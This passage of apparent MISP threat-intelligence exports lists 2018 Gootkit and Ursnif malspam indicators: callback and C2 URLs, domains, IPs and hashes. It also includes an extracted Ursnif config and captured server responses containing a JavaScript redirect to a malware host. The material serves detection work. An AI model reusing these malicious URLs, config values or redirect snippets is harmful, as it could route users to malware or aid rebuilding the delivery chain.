343 |                 "uuid": "5ab28b54-34fc-4cd7-a0e4-0d0fc0a8a8de",
344 |                 "event_id": "2619",
345 |                 "distribution": "5",
346 |                 "timestamp": "1521650516",
347 |                 "comment": "JS callback (MZ - Gootkit)",
348 |                 "sharing_group_id": "0",
349 |                 "deleted": false,
350 |                 "disable_correlation": false,
351 |                 "object_id": "0",
352 |                 "object_relation": null,
353 |                 "value": "kontaktuhan.org\/book\/facture.pdf",
354 |                 "ShadowAttribute": []
355 |             },
356 |             {
357 |                 "id": "58869",
358 |                 "type": "url",
359 |                 "category": "Network activity",
360 |                 "to_ids": true,
361 |                 "uuid": "5ab28b54-4550-4029-a0a8-0d0fc0a8a8de",
362 |                 "event_id": "2619",
363 |                 "distribution": "5",
364 |                 "timestamp": "1521650516",
365 |                 "comment": "JS callback (MZ - Gootkit)",
366 |                 "sharing_group_id": "0",
367 |                 "deleted": false,
368 |                 "disable_correlation": false,
369 |                 "object_id": "0",
370 |                 "object_relation": null,
371 |                 "value": "venusagency.me\/data\/facture.pdf",
372 |                 "ShadowAttribute": []
373 |             },
374 |             {
375 |                 "id": "58870",
376 |                 "type": "md5",
377 |                 "category": "Payload delivery",
378 |                 "to_ids": true,
379 |                 "uuid": "5ab28b8d-c704-4526-a170-6525c0a8a8de",
380 |                 "event_id": "2619",
381 |                 "distribution": "5",
382 |                 "timestamp": "1521650573",
383 |                 "comment": "Gootkit",
384 |                 "sharing_group_id": "0",
385 |                 "deleted": false,
386 |                 "disable_correlation": false,
387 |                 "object_id": "0",
388 |                 "object_relation": null,
389 |                 "value": "b624b04f6c77f0d784313adddf868cbe",
390 |                 "ShadowAttribute": []
391 |             },
392 |             {
393 |                 "id": "58871",
394 |                 "type": "sha1",
395 |                 "category": "Payload delivery",
396 |                 "to_ids": true,
397 |                 "uuid": "5ab28b8d-3abc-423e-90a5-6525c0a8a8de",
398 |                 "event_id": "2619",
399 |                 "distribution": "5",
400 |                 "timestamp": "1521650573",
401 |                 "comment": "Gootkit",
402 |                 "sharing_group_id": "0",
403 |                 "deleted": false,
404 |                 "disable_correlation": false,
405 |                 "object_id": "0",
406 |                 "object_relation": null,
407 |                 "value": "9394679f7f5f5ad555e0319e3d7c74df1cd56ee9",
408 |                 "ShadowAttribute": []
409 |             },
410 |             {
411 |                 "id": "58872",
412 |                 "type": "sha256",
413 |                 "category": "Payload delivery",
414 |                 "to_ids": true,
415 |                 "uuid": "5ab28b8d-b278-4d2c-a328-6525c0a8a8de",
416 |                 "event_id": "2619",
417 |                 "distribution": "5",
418 |                 "timestamp": "1521650573",
419 |                 "comment": "Gootkit",
420 |                 "sharing_group_id": "0",
421 |                 "deleted": false,
422 |                 "disable_correlation": false,
423 |                 "object_id": "0",
424 |                 "object_relation": null,
425 |                 "value": "199ccd36e1ff2ca04dba65124a7202b2aa452506edaff313070ee001e6527d08",
426 |                 "ShadowAttribute": []
427 |             },
428 |             {
429 |                 "id": "58873",
430 |                 "type": "domain|ip",
431 |                 "category": "Network activity",
432 |                 "to_ids": true,
433 |                 "uuid": "5ab28bf8-8dc0-445c-8206-5e89c0a8a8de",
434 |                 "event_id": "2619",
435 |                 "distribution": "5",
436 |                 "timestamp": "1521650680",
437 |                 "comment": "GootKit C2 - 2018-03-21",
438 |                 "sharing_group_id": "0",
439 |                 "deleted": false,
440 |                 "disable_correlation": false,
441 |                 "object_id": "0",
442 |                 "object_relation": null,
443 |                 "value": "central.inner-heart.com|185.77.129.221",
444 |                 "ShadowAttribute": []
445 |             },
446 |             {
447 |                 "id": "58874",
448 |                 "type": "domain|ip",
449 |                 "category": "Network activity",
450 |                 "to_ids": true,
451 |                 "uuid": "5ab28bf8-e680-431a-afdb-5e89c0a8a8de",
452 |                 "event_id": "2619",
453 |                 "distribution": "5",
454 |                 "timestamp": "1521650680",
455 |                 "comment": "GootKit C2 - 2018-03-21",
456 |                 "sharing_group_id": "0",
457 |                 "deleted": false,
458 |                 "disable_correlation": false,
459 |                 "object_id": "0",
460 |                 "object_relation": null,
461 |                 "value": "denso.themessexpress.com|185.77.129.221",
462 |                 "ShadowAttribute": []
463 |             },
464 |             {
465 |                 "id": "58875",
466 |                 "type": "domain|ip",
467 |                 "category": "Network activity",
468 |                 "to_ids": false,
469 |                 "uuid": "5ab28c13-491c-48cd-b47f-649dc0a8a8de",
470 |                 "event_id": "2619",
471 |                 "distribution": "5",
472 |                 "timestamp": "1521650707",
473 |                 "comment": "Domain resolved by Gootkit - 2018-03-21",
474 |                 "sharing_group_id": "0",
475 |                 "deleted": false,
476 |                 "disable_correlation": false,
477 |                 "object_id": "0",
478 |                 "object_relation": null,
479 |                 "value": "stormsfronts.com|127.0.0.1",
480 |                 "ShadowAttribute": []
481 |             },
482 |             {
483 |                 "id": "58876",
484 |                 "type": "domain|ip",
485 |                 "category": "Network activity",
486 |                 "to_ids": false,
487 |                 "uuid": "5ab28c13-e040-4bdf-8985-649dc0a8a8de",
488 |                 "event_id": "2619",
489 |                 "distribution": "5",
490 |                 "timestamp": "1521650707",
491 |                 "comment": "Domain resolved by Gootkit - 2018-03-21",
492 |                 "sharing_group_id": "0",
493 |                 "deleted": false,
494 |                 "disable_correlation": false,
495 |                 "object_id": "0",
496 |                 "object_relation": null,
497 |                 "value": "pixmania.biz|104.238.170.189",
498 |                 "ShadowAttribute": []
499 |             },
500 |             {
501 |                 "id": "58877",
502 |                 "type": "url",
503 |                 "category": "Network activity",
504 |                 "to_ids": true,
505 |                 "uuid": "5ab28c6c-439c-4966-ae7c-5e8bc0a8a8de",
506 |                 "event_id": "2619",
507 |                 "distribution": "5",
508 |                 "timestamp": "1521650796",
509 |                 "comment": "Gootkit Callback",
510 |                 "sharing_group_id": "0",
511 |                 "deleted": false,
512 |                 "disable_correlation": false,
513 |                 "object_id": "0",
514 |                 "object_relation": null,
515 |                 "value": "denso.themessexpress.com\/rpersist4\/1737120684",
516 |                 "ShadowAttribute": []
517 |             },
518 |             {
519 |                 "id": "58878",
520 |                 "type": "domain|ip",
521 |                 "category": "Network activity",
522 |                 "to_ids": true,
523 |                 "uuid": "5ab28ef4-21d0-4f2e-9a57-649dc0a8a8de",
524 |                 "event_id": "2619",
525 |                 "distribution": "5",
526 |                 "timestamp": "1521651444",
527 |                 "comment": "Binary Server hosting js callback ( \/data\/facture.pdf - Gootkit)",
528 |                 "sharing_group_id": "0",
529 |                 "deleted": false,
530 |                 "disable_correlation": false,
531 |                 "object_id": "0",
532 |                 "object_relation": null,
533 |                 "value": "venusagency.me|74.220.207.144",
534 |                 "ShadowAttribute": []
535 |             },
536 |             {
537 |                 "id": "58879",
538 |                 "type": "link",
539 |                 "category": "External analysis",
540 |                 "to_ids": false,
541 |                 "uuid": "5ab28feb-58b4-403f-a5e4-5e8bc0a8a8de",
542 |                 "event_id": "2619",
543 |                 "distribution": "5",
544 |                 "timestamp": "1521651691",
545 |                 "comment": "Une vague massive de Trojan Bancaire frappe les entreprises fran\u00e7aises par email - 2018-03-21",
546 |                 "sharing_group_id": "0",
547 |                 "deleted": false,
548 |                 "disable_correlation": false,
549 |                 "object_id": "0",
550 |                 "object_relation": null,
551 |                 "value": "https:\/\/www.vadesecure.com\/fr\/une-vague-massive-de-trojan-bancaire-frappe-les-entreprises-francaises-par-email\/?utm_content=68900076&utm_medium=social&utm_source=twitter",
552 |                 "ShadowAttribute": []
553 |             },
554 |             {
555 |                 "id": "58880",
556 |                 "type": "domain|ip",
557 |                 "category": "Network activity",
558 |                 "to_ids": true,
559 |                 "uuid": "5ab29101-45c4-46d2-9502-5e8bc0a8a8de",
560 |                 "event_id": "2619",
561 |                 "distribution": "5",
562 |                 "timestamp": "1521651969",
563 |                 "comment": "Server hosting facture link (gootkit) but also hosting AU ursnif from other campaign)",
564 |                 "sharing_group_id": "0",
565 |                 "deleted": false,
566 |                 "disable_correlation": false,
567 |                 "object_id": "0",
568 |                 "object_relation": null,
569 |                 "value": "intervacpvtltd.com|173.244.161.21",
570 |                 "ShadowAttribute": []
571 |             },
572 |             {
573 |                 "id": "58881",
574 |                 "type": "attachment",
575 |                 "category": "Payload delivery",
576 |                 "to_ids": false,
577 |                 "uuid": "5ab29117-984c-4190-924b-5e89c0a8a8de",
578 |                 "event_id": "2619",
579 |                 "distribution": "5",
580 |                 "timestamp": "1521651991",
581 |                 "comment": "Opendir tied to AU Ursnif campaign",
582 |                 "sharing_group_id": "0",
583 |                 "deleted": false,
584 |                 "disable_correlation": false,
585 |                 "object_id": "0",
586 |                 "object_relation": null,
587 |                 "value": "2018-03-21_14h52_40.png",
588 |                 "ShadowAttribute": []
589 |             },
590 |             {
591 |                 "id": "58882",
592 |                 "type": "attachment",
593 |                 "category": "Payload delivery",
594 |                 "to_ids": false,
595 |                 "uuid": "5ab29117-6e1c-4ffa-b5ec-5e89c0a8a8de",
596 |                 "event_id": "2619",
597 |                 "distribution": "5",
598 |                 "timestamp": "1521651991",
599 |                 "comment": "Opendir tied to AU Ursnif campaign",
600 |                 "sharing_group_id": "0",
601 |                 "deleted": false,
602 |                 "disable_correlation": false,
603 |                 "object_id": "0",
604 |                 "object_relation": null,
605 |                 "value": "2018-03-21_15h02_35.png",
606 |                 "ShadowAttribute": []
607 |             }
608 |         ],
609 |         "ShadowAttribute": [],
610 |         "RelatedEvent": [
611 |             {
612 |                 "Event": {
613 |                     "id": "2620",
614 |                     "date": "2018-03-21",
615 |                     "threat_level_id": "1",
616 |                     "info": "malspam_180321_3",
617 |                     "published": true,
618 |                     "uuid": "5ab2c6ae-e67c-47e0-9aa2-4f46c0a8a8de",
619 |                     "analysis": "2",
620 |                     "timestamp": "1521666309",
621 |                     "distribution": "2",
622 |                     "org_id": "1",
623 |                     "orgc_id": "1",
624 |                     "Org": {
625 |                         "id": "1",
626 |                         "name": "DNC",
627 |                         "uuid": "5749cdb1-1e74-450f-8baf-3ba5c0a8a8de"
628 |                     },
629 |                     "Orgc": {
630 |                         "id": "1",
631 |                         "name": "DNC",
632 |                         "uuid": "5749cdb1-1e74-450f-8baf-3ba5c0a8a8de"
633 |                     }
634 |                 }
635 |             }
636 |         ],
637 |         "Galaxy": [],
638 |         "Object": [],
639 |         "Tag": [
640 |             {
641 |                 "id": "205",
642 |                 "name": "dnc:driveby-type=\"Malspam\"",
643 |                 "colour": "#000000",
644 |                 "exportable": true,
645 |                 "hide_tag": false
646 |             },
647 |             {
648 |                 "id": "477",
649 |                 "name": "dnc:malspam-type=\"url-to-zipped-js\"",
650 |                 "colour": "#390658",
651 |                 "exportable": true,
652 |                 "hide_tag": false
653 |             },
654 |             {
655 |                 "id": "1599",
656 |                 "name": "dnc:tds=\"BlackTDS\"",
657 |                 "colour": "#ffffff",
658 |                 "exportable": true,
659 |                 "hide_tag": false
660 |             },
661 |             {
662 |                 "id": "636",
663 |                 "name": "dnc:attrib-int=\"170007\"",
664 |                 "colour": "#5e5e5e",
665 |                 "exportable": true,
666 |                 "hide_tag": false
667 |             },
668 |             {
669 |                 "id": "637",
670 |                 "name": "dnc:attrib=\"Sagrid\"",
671 |                 "colour": "#5e5e5e",
672 |                 "exportable": true,
673 |                 "hide_tag": false
674 |             },
675 |             {
676 |                 "id": "107",
677 |                 "name": "dnc:country=\"FRA\"",
678 |                 "colour": "#0000f8",
679 |                 "exportable": true,
680 |                 "hide_tag": false
681 |             },
682 |             {
683 |                 "id": "73",
684 |                 "name": "dnc:malware=\"Gootkit\"",
685 |                 "colour": "#f0f0f0",
686 |                 "exportable": true,
687 |                 "hide_tag": false
688 |             }
689 |         ]
690 |     }
691 | }]}
692 | 


--------------------------------------------------------------------------------
/IOCs/misp.event.2834.5b22c1bd-1ab8-4506-b4a6-1746c0a8a8de.json:
--------------------------------------------------------------------------------
   1 | {"response":[{
   2 |     "Event": {
   3 |         "id": "2834",
   4 |         "orgc_id": "1",
   5 |         "org_id": "1",
   6 |         "date": "2018-06-14",
   7 |         "threat_level_id": "1",
   8 |         "info": "malspam_2018-06-14_3",
   9 |         "published": true,
  10 |         "uuid": "5b22c1bd-1ab8-4506-b4a6-1746c0a8a8de",
  11 |         "attribute_count": "38",
  12 |         "analysis": "2",
  13 |         "timestamp": "1529005516",
  14 |         "distribution": "2",
  15 |         "proposal_email_lock": false,
  16 |         "locked": false,
  17 |         "publish_timestamp": "1529005535",
  18 |         "sharing_group_id": "0",
  19 |         "disable_correlation": false,
  20 |         "extends_uuid": "",
  21 |         "event_creator_email": "kafeine@dontneedcoffee.com",
  22 |         "Org": {
  23 |             "id": "1",
  24 |             "name": "DNC",
  25 |             "uuid": "5749cdb1-1e74-450f-8baf-3ba5c0a8a8de"
  26 |         },
  27 |         "Orgc": {
  28 |             "id": "1",
  29 |             "name": "DNC",
  30 |             "uuid": "5749cdb1-1e74-450f-8baf-3ba5c0a8a8de"
  31 |         },
  32 |         "Attribute": [
  33 |             {
  34 |                 "id": "69262",
  35 |                 "type": "url",
  36 |                 "category": "Network activity",
  37 |                 "to_ids": true,
  38 |                 "uuid": "5b22c231-bf54-42cf-bf4c-34cdc0a8a8de",
  39 |                 "event_id": "2834",
  40 |                 "distribution": "5",
  41 |                 "timestamp": "1529004593",
  42 |                 "comment": "Example of URL in spam",
  43 |                 "sharing_group_id": "0",
  44 |                 "deleted": false,
  45 |                 "disable_correlation": false,
  46 |                 "object_id": "0",
  47 |                 "object_relation": null,
  48 |                 "value": "http:\/\/www.floramae.tk\/wp-content\/plugins\/joycazino\/A_misfigure_gallicolous.html",
  49 |                 "ShadowAttribute": []
  50 |             },
  51 |             {
  52 |                 "id": "69263",
  53 |                 "type": "url",
  54 |                 "category": "Network activity",
  55 |                 "to_ids": true,
  56 |                 "uuid": "5b22c231-4208-4fe5-b7c8-34cdc0a8a8de",
  57 |                 "event_id": "2834",
  58 |                 "distribution": "5",
  59 |                 "timestamp": "1529004593",
  60 |                 "comment": "Example of URL in spam",
  61 |                 "sharing_group_id": "0",
  62 |                 "deleted": false,
  63 |                 "disable_correlation": false,
  64 |                 "object_id": "0",
  65 |                 "object_relation": null,
  66 |                 "value": "http:\/\/www.klassicwaterproofing.com\/images\/resource\/products\/Y_List_Bare.html",
  67 |                 "ShadowAttribute": []
  68 |             },
  69 |             {
  70 |                 "id": "69264",
  71 |                 "type": "url",
  72 |                 "category": "Network activity",
  73 |                 "to_ids": true,
  74 |                 "uuid": "5b22c231-b364-4a22-b33c-34cdc0a8a8de",
  75 |                 "event_id": "2834",
  76 |                 "distribution": "5",
  77 |                 "timestamp": "1529004593",
  78 |                 "comment": "Example of URL in spam",
  79 |                 "sharing_group_id": "0",
  80 |                 "deleted": false,
  81 |                 "disable_correlation": false,
  82 |                 "object_id": "0",
  83 |                 "object_relation": null,
  84 |                 "value": "http:\/\/www.akariem.com\/wp-content\/themes\/zenwater\/U_scratchlike_renewment.html",
  85 |                 "ShadowAttribute": []
  86 |             },
  87 |             {
  88 |                 "id": "69265",
  89 |                 "type": "url",
  90 |                 "category": "Network activity",
  91 |                 "to_ids": true,
  92 |                 "uuid": "5b22c25a-73bc-4b1c-9b26-1742c0a8a8de",
  93 |                 "event_id": "2834",
  94 |                 "distribution": "5",
  95 |                 "timestamp": "1529004634",
  96 |                 "comment": "Intermediate Redirector",
  97 |                 "sharing_group_id": "0",
  98 |                 "deleted": false,
  99 |                 "disable_correlation": false,
 100 |                 "object_id": "0",
 101 |                 "object_relation": null,
 102 |                 "value": "http:\/\/kingerosses.top\/",
 103 |                 "ShadowAttribute": []
 104 |             },
 105 |             {
 106 |                 "id": "69266",
 107 |                 "type": "url",
 108 |                 "category": "Network activity",
 109 |                 "to_ids": true,
 110 |                 "uuid": "5b22c25a-919c-4db7-a8f1-1742c0a8a8de",
 111 |                 "event_id": "2834",
 112 |                 "distribution": "5",
 113 |                 "timestamp": "1529004634",
 114 |                 "comment": "BlackTDS",
 115 |                 "sharing_group_id": "0",
 116 |                 "deleted": false,
 117 |                 "disable_correlation": false,
 118 |                 "object_id": "0",
 119 |                 "object_relation": null,
 120 |                 "value": "https:\/\/darksoulshere.gq\/",
 121 |                 "ShadowAttribute": []
 122 |             },
 123 |             {
 124 |                 "id": "69267",
 125 |                 "type": "url",
 126 |                 "category": "Network activity",
 127 |                 "to_ids": true,
 128 |                 "uuid": "5b22c25a-6e44-4a88-a699-1742c0a8a8de",
 129 |                 "event_id": "2834",
 130 |                 "distribution": "5",
 131 |                 "timestamp": "1529004634",
 132 |                 "comment": "URL to JS",
 133 |                 "sharing_group_id": "0",
 134 |                 "deleted": false,
 135 |                 "disable_correlation": false,
 136 |                 "object_id": "0",
 137 |                 "object_relation": null,
 138 |                 "value": "http:\/\/vunteriseffe.top\/corps\/get.php",
 139 |                 "ShadowAttribute": []
 140 |             },
 141 |             {
 142 |                 "id": "69268",
 143 |                 "type": "url",
 144 |                 "category": "Network activity",
 145 |                 "to_ids": true,
 146 |                 "uuid": "5b22c25a-04d0-4387-863b-1742c0a8a8de",
 147 |                 "event_id": "2834",
 148 |                 "distribution": "5",
 149 |                 "timestamp": "1529004634",
 150 |                 "comment": "JS callback (Ursnif)",
 151 |                 "sharing_group_id": "0",
 152 |                 "deleted": false,
 153 |                 "disable_correlation": false,
 154 |                 "object_id": "0",
 155 |                 "object_relation": null,
 156 |                 "value": "http:\/\/vunteriseffe.top\/get.php?lBHLYrp",
 157 |                 "ShadowAttribute": []
 158 |             },
 159 |             {
 160 |                 "id": "69281",
 161 |                 "type": "domain",
 162 |                 "category": "Network activity",
 163 |                 "to_ids": true,
 164 |                 "uuid": "5b22c313-4cb4-4e29-a778-1ea9c0a8a8de",
 165 |                 "event_id": "2834",
 166 |                 "distribution": "5",
 167 |                 "timestamp": "1529004819",
 168 |                 "comment": "Ursnif C2 from Config",
 169 |                 "sharing_group_id": "0",
 170 |                 "deleted": false,
 171 |                 "disable_correlation": false,
 172 |                 "object_id": "0",
 173 |                 "object_relation": null,
 174 |                 "value": "theformthefollbinretain.club",
 175 |                 "ShadowAttribute": []
 176 |             },
 177 |             {
 178 |                 "id": "69282",
 179 |                 "type": "domain",
 180 |                 "category": "Network activity",
 181 |                 "to_ids": true,
 182 |                 "uuid": "5b22c313-6058-43fa-9df9-1ea9c0a8a8de",
 183 |                 "event_id": "2834",
 184 |                 "distribution": "5",
 185 |                 "timestamp": "1529004819",
 186 |                 "comment": "Ursnif C2 from Config",
 187 |                 "sharing_group_id": "0",
 188 |                 "deleted": false,
 189 |                 "disable_correlation": false,
 190 |                 "object_id": "0",
 191 |                 "object_relation": null,
 192 |                 "value": "thisdocumentationcopy.club",
 193 |                 "ShadowAttribute": []
 194 |             },
 195 |             {
 196 |                 "id": "69283",
 197 |                 "type": "domain",
 198 |                 "category": "Network activity",
 199 |                 "to_ids": true,
 200 |                 "uuid": "5b22c313-4bc0-4e82-bca5-1ea9c0a8a8de",
 201 |                 "event_id": "2834",
 202 |                 "distribution": "5",
 203 |                 "timestamp": "1529004819",
 204 |                 "comment": "Ursnif C2 from Config",
 205 |                 "sharing_group_id": "0",
 206 |                 "deleted": false,
 207 |                 "disable_correlation": false,
 208 |                 "object_id": "0",
 209 |                 "object_relation": null,
 210 |                 "value": "featttfolldisclaimer.club",
 211 |                 "ShadowAttribute": []
 212 |             },
 213 |             {
 214 |                 "id": "69284",
 215 |                 "type": "domain",
 216 |                 "category": "Network activity",
 217 |                 "to_ids": true,
 218 |                 "uuid": "5b22c313-1dc4-444d-b67d-1ea9c0a8a8de",
 219 |                 "event_id": "2834",
 220 |                 "distribution": "5",
 221 |                 "timestamp": "1529004819",
 222 |                 "comment": "Ursnif C2 from Config",
 223 |                 "sharing_group_id": "0",
 224 |                 "deleted": false,
 225 |                 "disable_correlation": false,
 226 |                 "object_id": "0",
 227 |                 "object_relation": null,
 228 |                 "value": "whetherbutthiscode.club",
 229 |                 "ShadowAttribute": []
 230 |             },
 231 |             {
 232 |                 "id": "69285",
 233 |                 "type": "pattern-in-memory",
 234 |                 "category": "Payload installation",
 235 |                 "to_ids": false,
 236 |                 "uuid": "5b22c3a0-a9dc-4e4b-bb22-1742c0a8a8de",
 237 |                 "event_id": "2834",
 238 |                 "distribution": "5",
 239 |                 "timestamp": "1529004960",
 240 |                 "comment": "Ursnif Config",
 241 |                 "sharing_group_id": "0",
 242 |                 "deleted": false,
 243 |                 "disable_correlation": false,
 244 |                 "object_id": "0",
 245 |                 "object_relation": null,
 246 |                 "value": "type: isfb\r\nbctimeout: 10\r\nbotnet: 2002\r\ncompilation_date: Apr 9 2018\r\nconfigfailtimeout: 30\r\nconfigtimeout: 360\r\ndga_base_url: www.openssl.org\/source\/license.txt\r\ndga_count: 5\r\ndga_crc: 1178005749\r\ndga_lsa_seed: 3988359472\r\ndga_season: 5\r\ndga_seed: 1\r\ndga_tld: .club\r\ndomains: otherwiselist.at, aaxvkah7dudzoloq.onion\r\nexe_type: worker\r\nip_service: curlmyip.net\r\nkey: Gu9foUnsY506KSJ1\r\nknockertimeout: 120\r\nobfuscation_method: random-picture-path\r\npanel_type: dreambot\r\npublic_key: 27128630415765994040955744015030070035596412432263378648451342271896999564591778392380252218629171292393835044846760473972123898033112684033003992892755637641333031709989882836572683552148935712373385829601241246843039177999788343130062892018522696242710077005694634582129152392241934085107745034082445602130862004358119025920663040324744350770368639811520570222557121492480646961107837256814943238176846221993809348278287890366938945719572043524471423913911112015173484009855057342010816848643375839718028796037662372254268324634815343900592089617456027459527165881639074855043692671009442219068102732790893211474593, 65537\r\nsendtimeout: 300\r\nserver: 12\r\nssl: true\r\ntasktimeout: 120\r\ntimer: 60\r\ntor32_dll: providedatheyfromyouthe.club\/key\/x32.bin file:\/\/%appdata%\/system32.dll\r\ntor64_dll: providedatheyfromyouthe.club\/key\/x64.bin file:\/\/%appdata%\/system64.dll\r\nversion: 2.16.994\r\nxcookie: 1936486000",
 247 |                 "ShadowAttribute": []
 248 |             },
 249 |             {
 250 |                 "id": "69296",
 251 |                 "type": "url",
 252 |                 "category": "Network activity",
 253 |                 "to_ids": true,
 254 |                 "uuid": "5b22c43f-39b4-4f9b-a295-45f7c0a8a8de",
 255 |                 "event_id": "2834",
 256 |                 "distribution": "5",
 257 |                 "timestamp": "1529005119",
 258 |                 "comment": "Tor Module for Dreambot",
 259 |                 "sharing_group_id": "0",
 260 |                 "deleted": false,
 261 |                 "disable_correlation": false,
 262 |                 "object_id": "0",
 263 |                 "object_relation": null,
 264 |                 "value": "providedatheyfromyouthe.club\/key\/x32.bin",
 265 |                 "ShadowAttribute": []
 266 |             },
 267 |             {
 268 |                 "id": "69297",
 269 |                 "type": "url",
 270 |                 "category": "Network activity",
 271 |                 "to_ids": true,
 272 |                 "uuid": "5b22c43f-5d54-49ad-ad8b-45f7c0a8a8de",
 273 |                 "event_id": "2834",
 274 |                 "distribution": "5",
 275 |                 "timestamp": "1529005119",
 276 |                 "comment": "Tor Module for Dreambot",
 277 |                 "sharing_group_id": "0",
 278 |                 "deleted": false,
 279 |                 "disable_correlation": false,
 280 |                 "object_id": "0",
 281 |                 "object_relation": null,
 282 |                 "value": "providedatheyfromyouthe.club\/key\/x64.bin",
 283 |                 "ShadowAttribute": []
 284 |             },
 285 |             {
 286 |                 "id": "69321",
 287 |                 "type": "pattern-in-file",
 288 |                 "category": "Network activity",
 289 |                 "to_ids": false,
 290 |                 "uuid": "5b22c5bc-89ac-478f-9bc5-1745c0a8a8de",
 291 |                 "event_id": "2834",
 292 |                 "distribution": "5",
 293 |                 "timestamp": "1529005500",
 294 |                 "comment": "Response from BlackTDS",
 295 |                 "sharing_group_id": "0",
 296 |                 "deleted": false,
 297 |                 "disable_correlation": false,
 298 |                 "object_id": "0",
 299 |                 "object_relation": null,
 300 |                 "value": "HTTP\/1.1 200 OK\r\nServer: nginx\/1.12.2\r\nDate: Thu, 14 Jun 2018 14:54:52 GMT\r\nContent-Type: text\/html; charset=UTF-8\r\nConnection: keep-alive\r\nSet-Cookie: g_ptsn=darksoulshere.gq; expires=Fri, 24-Jan-2020 21:00:00 GMT; Max-Age=50911508\r\nSet-Cookie: g_sessn=1528988092; expires=Fri, 24-Jan-2020 21:00:00 GMT; Max-Age=50911508\r\nVary: Accept-Encoding\r\nContent-Length: 121\r\n\r\n \r\ndocument.write('\\<script type=\\'text\/javascript\\'\\>location = \\'http:\/\/vunteriseffe.top\/corps\/get.php\\';\\<\/script\\>');",
 301 |                 "ShadowAttribute": []
 302 |             },
 303 |             {
 304 |                 "id": "69322",
 305 |                 "type": "pattern-in-file",
 306 |                 "category": "Network activity",
 307 |                 "to_ids": false,
 308 |                 "uuid": "5b22c5cc-9bd4-4363-84a0-1744c0a8a8de",
 309 |                 "event_id": "2834",
 310 |                 "distribution": "5",
 311 |                 "timestamp": "1529005516",
 312 |                 "comment": "Response from Intermediate Redirector",
 313 |                 "sharing_group_id": "0",
 314 |                 "deleted": false,
 315 |                 "disable_correlation": false,
 316 |                 "object_id": "0",
 317 |                 "object_relation": null,
 318 |                 "value": "HTTP\/1.1 200 OK\r\nETag: \"30-5b2172d1-ac524b912013eef5;;;\"\r\nLast-Modified: Wed, 13 Jun 2018 19:38:57 GMT\r\nContent-Type: text\/html\r\nContent-Length: 48\r\nDate: Thu, 14 Jun 2018 14:55:36 GMT\r\nAccept-Ranges: bytes\r\nServer: LiteSpeed\r\nConnection: Keep-Alive\r\n\r\n<script src=\"https:\/\/darksoulshere.gq\"><\/script>",
 319 |                 "ShadowAttribute": []
 320 |             }
 321 |         ],
 322 |         "ShadowAttribute": [],
 323 |         "RelatedEvent": [
 324 |             {
 325 |                 "Event": {
 326 |                     "id": "2839",
 327 |                     "date": "2018-06-15",
 328 |                     "threat_level_id": "1",
 329 |                     "info": "malspam_2018-06-15_1",
 330 |                     "published": true,
 331 |                     "uuid": "5b239c08-526c-425c-9fcf-19abc0a8a8de",
 332 |                     "analysis": "2",
 333 |                     "timestamp": "1529061891",
 334 |                     "distribution": "2",
 335 |                     "org_id": "1",
 336 |                     "orgc_id": "1",
 337 |                     "Org": {
 338 |                         "id": "1",
 339 |                         "name": "DNC",
 340 |                         "uuid": "5749cdb1-1e74-450f-8baf-3ba5c0a8a8de"
 341 |                     },
 342 |                     "Orgc": {
 343 |                         "id": "1",
 344 |                         "name": "DNC",
 345 |                         "uuid": "5749cdb1-1e74-450f-8baf-3ba5c0a8a8de"
 346 |                     }
 347 |                 }
 348 |             },
 349 |             {
 350 |                 "Event": {
 351 |                     "id": "2833",
 352 |                     "date": "2018-06-14",
 353 |                     "threat_level_id": "1",
 354 |                     "info": "malspam_2018-06-14_1",
 355 |                     "published": true,
 356 |                     "uuid": "5b226f35-3c3c-43b5-a170-17e3c0a8a8de",
 357 |                     "analysis": "2",
 358 |                     "timestamp": "1528989493",
 359 |                     "distribution": "2",
 360 |                     "org_id": "1",
 361 |                     "orgc_id": "1",
 362 |                     "Org": {
 363 |                         "id": "1",
 364 |                         "name": "DNC",
 365 |                         "uuid": "5749cdb1-1e74-450f-8baf-3ba5c0a8a8de"
 366 |                     },
 367 |                     "Orgc": {
 368 |                         "id": "1",
 369 |                         "name": "DNC",
 370 |                         "uuid": "5749cdb1-1e74-450f-8baf-3ba5c0a8a8de"
 371 |                     }
 372 |                 }
 373 |             },
 374 |             {
 375 |                 "Event": {
 376 |                     "id": "2836",
 377 |                     "date": "2018-06-14",
 378 |                     "threat_level_id": "1",
 379 |                     "info": "GrandSoft_2018-06-14_1",
 380 |                     "published": true,
 381 |                     "uuid": "5b22c6be-acec-4dc5-b46a-1742c0a8a8de",
 382 |                     "analysis": "2",
 383 |                     "timestamp": "1529006902",
 384 |                     "distribution": "2",
 385 |                     "org_id": "1",
 386 |                     "orgc_id": "1",
 387 |                     "Org": {
 388 |                         "id": "1",
 389 |                         "name": "DNC",
 390 |                         "uuid": "5749cdb1-1e74-450f-8baf-3ba5c0a8a8de"
 391 |                     },
 392 |                     "Orgc": {
 393 |                         "id": "1",
 394 |                         "name": "DNC",
 395 |                         "uuid": "5749cdb1-1e74-450f-8baf-3ba5c0a8a8de"
 396 |                     }
 397 |                 }
 398 |             },
 399 |             {
 400 |                 "Event": {
 401 |                     "id": "2837",
 402 |                     "date": "2018-06-14",
 403 |                     "threat_level_id": "1",
 404 |                     "info": "GrandSoft_2018-06-14_2",
 405 |                     "published": true,
 406 |                     "uuid": "5b22cb5f-6384-4536-8297-1746c0a8a8de",
 407 |                     "analysis": "2",
 408 |                     "timestamp": "1529007959",
 409 |                     "distribution": "2",
 410 |                     "org_id": "1",
 411 |                     "orgc_id": "1",
 412 |                     "Org": {
 413 |                         "id": "1",
 414 |                         "name": "DNC",
 415 |                         "uuid": "5749cdb1-1e74-450f-8baf-3ba5c0a8a8de"
 416 |                     },
 417 |                     "Orgc": {
 418 |                         "id": "1",
 419 |                         "name": "DNC",
 420 |                         "uuid": "5749cdb1-1e74-450f-8baf-3ba5c0a8a8de"
 421 |                     }
 422 |                 }
 423 |             },
 424 |             {
 425 |                 "Event": {
 426 |                     "id": "2829",
 427 |                     "date": "2018-06-13",
 428 |                     "threat_level_id": "1",
 429 |                     "info": "malspam_2018-06-13_1",
 430 |                     "published": true,
 431 |                     "uuid": "5b211051-9164-4d0f-8269-5570c0a8a8de",
 432 |                     "analysis": "2",
 433 |                     "timestamp": "1528894476",
 434 |                     "distribution": "2",
 435 |                     "org_id": "1",
 436 |                     "orgc_id": "1",
 437 |                     "Org": {
 438 |                         "id": "1",
 439 |                         "name": "DNC",
 440 |                         "uuid": "5749cdb1-1e74-450f-8baf-3ba5c0a8a8de"
 441 |                     },
 442 |                     "Orgc": {
 443 |                         "id": "1",
 444 |                         "name": "DNC",
 445 |                         "uuid": "5749cdb1-1e74-450f-8baf-3ba5c0a8a8de"
 446 |                     }
 447 |                 }
 448 |             },
 449 |             {
